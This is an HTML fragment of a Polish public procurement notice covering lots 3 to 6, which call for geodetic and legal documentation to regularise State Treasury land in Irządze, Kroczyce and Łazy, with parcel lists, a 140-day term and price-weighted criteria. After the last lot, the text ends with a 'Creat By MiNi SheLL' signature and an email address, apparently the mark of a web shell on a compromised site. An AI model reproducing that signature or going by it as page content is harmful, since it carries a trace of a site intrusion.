<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 140.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Irządze, oznaczonych jako działki o numerach: 162/2 k. m. 1 o pow. 0,0760 ha (obręb Zawadka), 219/2 k. m. 1 o pow. 0,0262 ha (obręb Zawadka), 220/2 k. m. 1 o pow. 0,0166 ha (obręb Zawadka), 220/4 k. m. 1 o pow. 0,0002 ha (obręb Zawadka),75/10 k .m. 1 opow. 0,0116 ha (obręb Zawada Pilicka), 75/16 k .m. 1 opow. 0,0032 ha (obręb Zawada Pilicka), 77/8 k .m. 1 opow. 0,0473 ha (obręb Zawada Pilicka), 95/9 k .m. 1 opow. 0,1655 ha (obręb Zawada Pilicka), 172/4 k .m. 3 opow. 0,0700 ha (obręb Zawada Pilicka), 172/9 k .m. 3 opow. 0,0371 ha (obręb Zawada Pilicka), 172/13 k .m. 3 opow. 0,0301 ha (obręb Zawada Pilicka), 177/8  k .m. 1 opow. 0,1360 ha (obręb Zawada Pilicka), 186/5 k .m. 1 opow. 0,0735 ha (obręb Zawada Pilicka), 186/8 k .m. 1 opow. 0,1140 ha (obręb Zawada Pilicka), 187/4 k .m. 1 opow. 0,1355 ha (obręb Zawada Pilicka), 188/9 k .m. 1 opow. 0,0944 ha (obręb Zawada Pilicka), 188/12 k .m. 1 opow. 0,0984 ha (obręb Zawada Pilicka), 188/15 k .m. 1 opow. 0,0983 ha (obręb Zawada Pilicka), 190/4 k .m. 1 opow. 0,1274 ha (obręb Zawada Pilicka), 190/7 k .m. 1 o pow. 0,1985 ha (obręb Zawada Pilicka), 191/11 k .m. 1 opow. 0,0503 ha (obręb Zawada Pilicka), 195/2 k .m. 1 opow. 0,3820 ha (obręb Zawada Pilicka), 197/5 k .m. 1 opow. 0,0300 ha (obręb Zawada Pilicka), 197/6 k .m. 1 opow. 0,0739 ha (obręb Zawada Pilicka), 197/8  k .m. 1 opow. 0,1560 ha (obręb Zawada Pilicka), 199/6 k .m. 1 opow. 0,0587 ha (obręb Zawada Pilicka) -  pow. łączna ok.  2,3143  ha (26 działek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 140.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Kroczyce, oznaczonych jako działki  o numerach:  411/1 k. m. 4 o pow. 0,0304 ha (obręb Biała Błotna), 413/1 k. m. 4 o pow. 0,2550 ha (obręb Biała Błotna), 416/4 k. m. 4 o pow. 0,0156 ha (obręb Biała Błotna), 416/2 k. m. 4 o pow. 0,4699 ha (obręb Biała Błotna), 447/1 k. m. 5 o pow. 0,3000 ha (obręb Biała Błotna), 617/4 k. m. 5 o pow. 0,0243 ha (obręb Biała Błotna), 606/20 k. m. 6 o pow. 0,1092 ha (obręb Biała Błotna), 606/21 k. m. 6 o pow. 0,6703 ha (obręb Biała Błotna), 609/1 k. m. 6 o pow. 0,7983 ha (obręb Biała Błotna), 611/1 k. m. 6 o pow. 0,1633 ha (obręb Biała Błotna),   1031/5 k.m.8 o pow. 0,0320 ha  ,918/2 k. m. 8 o pow. 0,0338 ha i 893/2 k.m.8  o pow.0,0117 (obręb Dzibice),1/2 k. m. 1 o pow. 0,0131 ha (obręb Kroczyce Okupne), 21/2 k. m. 1 o pow. 0,0187 ha(obręb Kroczyce Okupne), 39/2 k. m. 1 o pow. 0,0049 ha(obręb Kroczyce Okupne), 55/2 k. m. 1  o pow. 0,0187 ha(obręb Kroczyce Okupne),639/1 k. m. 6 o pow.0,0379 ha(obręb Kroczyce Okupne),645/2 k. m. 6 o pow. 0,5829 ha (obręb Kroczyce Okupne),645/6 k. m. 6 o pow. 0,0543 ha (obręb Kroczyce Okupne), 463/2 k. m. 6 opow. 0,0532 ha (obręb Kroczyce Okupne), 633/1 k. m.6 o pow. 0,0237 ha (obręb Kroczyce Okupne),   - pow. łączna ok.  3,7653  ha (22 działki)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 140.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjnej - wykazu synchronizacyjnego do regulacji stanu prawnego nieruchomości Skarbu Państwa położonej  w Niegowoniczkach, g. Łazy  oznaczonej jako działki o numerach ewidencyjnych: 2206 k. m. 1 o pow. 0,2309 ha, 2221 k. m. 1 o pow. 0,1776 ha, 2222 k. m. 1 o pow. 0,3386 ha, 2223 k. m. 1 o pow. 0,9508 ha, 2224 k.m.1 o pow. 0,4812 ha, 2225 k. m. 1 opow. 0,6944 ha, 2226 k.m.1 opow. 4,1364 ha, 2227  k. m. 1 o pow. 0,4571 ha, 2228 k. m. 1 o pow. 0,4285 ha, 2229 k. m. 1 o pow. 0,4767 ha, 2939 k. m. 5 o pow. 0,2590 ha, 3115 k. m 8 o pow. 9,1163 ha.., 3116 k. m. 8 o pow. 11,1637 ha, 3155 k. m. 9 o pow. 3,2141 ha, 3273 k. m. 1 0o pow. 2,5371 ha, 3362 k.m.6 o pow. 0,2151 ha - 16 działek o pow. łącznej 34,8774 ha. (brak tytułów prawnych do części -starych- działek rzutujący na założenie księgi na działki po scaleniu),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 140.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno - prawnej  w celu doprowadzenia do zgodności zapisów ewidencji gruntów i budynków z mapą ewidencyjną oraz do regulacji stanu prawnego nieruchomości Skarbu Państwa położonej w Irządzach oznaczonej starym numerem ewidencyjnym 814 k. m. 7 o pow. 4,4000 ha (aktualnie działka ujawniona                             w ewidencji nr 1/814 o pow. 2,3500 ha.). Do działki nr 814 istnieje tytuł prawny - decyzja Naczelnika Gminy Irządze nr 7/75 z dnia 31.12.1975r. o przejęciu na własność Państwa gospodarstwa rolnego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 140.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com